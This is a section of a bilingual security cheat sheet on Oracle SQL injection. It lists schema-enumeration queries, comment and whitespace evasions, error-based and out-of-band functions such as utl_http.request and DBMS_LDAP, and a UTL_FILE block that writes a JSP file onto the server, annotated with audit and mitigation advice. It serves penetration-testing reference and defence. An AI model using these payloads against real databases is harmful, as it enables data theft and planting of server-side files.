4.1.7.4. Oracle Payload
4.1.7.4.1. 常见Payload
- dump
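-- Data-dictionary enumeration on Oracle. These views are the first thing an
-- injected query reads to map the schema; from the defensive side, reads of
-- USER_TAB_COLUMNS / ALL_TABLES by an application account are a good audit
-- signal, and the application account should not need V$ views at all.
select * from v$tablespace;
select * from user_tables;
-- NOTE: Oracle stores unquoted object names upper-case in the data dictionary,
-- so the placeholder must be replaced with the upper-case name (e.g. 'USERS'),
-- otherwise the equality match on table_name returns no rows.
select column_name from user_tab_columns where table_name = 'table_name';
select column_name, data_type from user_tab_columns where table_name = 'table_name';
-- Terminated and lower-cased to match the other statements in this list.
select * from all_tables;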
- Comment
--
/**/
- Space
0x00
0x09
0xa-0xd
0x20
- 报错
utl_inaddr.get_host_name
ctxsys.drithsx.sn
ctxsys.CTX_REPORT.TOKEN_TYPE
XMLType
dbms_xdb_version.checkin
dbms_xdb_version.makeversioned
dbms_xdb_version.uncheckout
dbms_utility.sqlid_to_sqlhash
ordsys.ord_dicom.getmappingxpath
utl_inaddr.get_host_name
utl_inaddr.get_host_address
- OOB
utl_http.request
utl_inaddr.get_host_address
SYS.DBMS_LDAP.INIT
HTTPURITYPE
HTTP_URITYPE.GETCLOB
- 绕过
rawtohex
4.1.7.4.2. 写文件
-- Writes a file on the database server's filesystem through a directory
-- object and UTL_FILE. The two controls a defender owns here are the
-- directory object (who may create one, and which OS paths it may point at)
-- and EXECUTE on UTL_FILE.
-- CREATE DIRECTORY requires the CREATE ANY DIRECTORY system privilege;
-- audit that privilege and all directory DDL.
create or replace directory TEST_DIR as '/path/to/dir';
-- Grants read/write on the directory object to the SYSTEM account. The OS
-- path itself must also be writable by the database's OS user, or the
-- fopen below fails regardless of this grant.
grant read, write on directory TEST_DIR to system;
declare
-- handle returned by fopen and used by every UTL_FILE call below
isto_file utl_file.file_type;
begin
-- 'W' opens the file for writing (not append); the name is resolved
-- relative to the directory object, not to an absolute path.
isto_file := utl_file.fopen('TEST_DIR', 'test.jsp', 'W');
-- Writes one line of content to the server-side file.
utl_file.put_line(isto_file, '<% out.println("test"); %>');
-- fflush pushes buffered output to disk; fclose releases the handle.
utl_file.fflush(isto_file);
utl_file.fclose(isto_file);
end;
-- Mitigation: UTL_FILE has historically been executable by PUBLIC; revoke it
-- where the application does not need it, keep directory objects off any
-- path served by a web tier, and alert on new directory objects.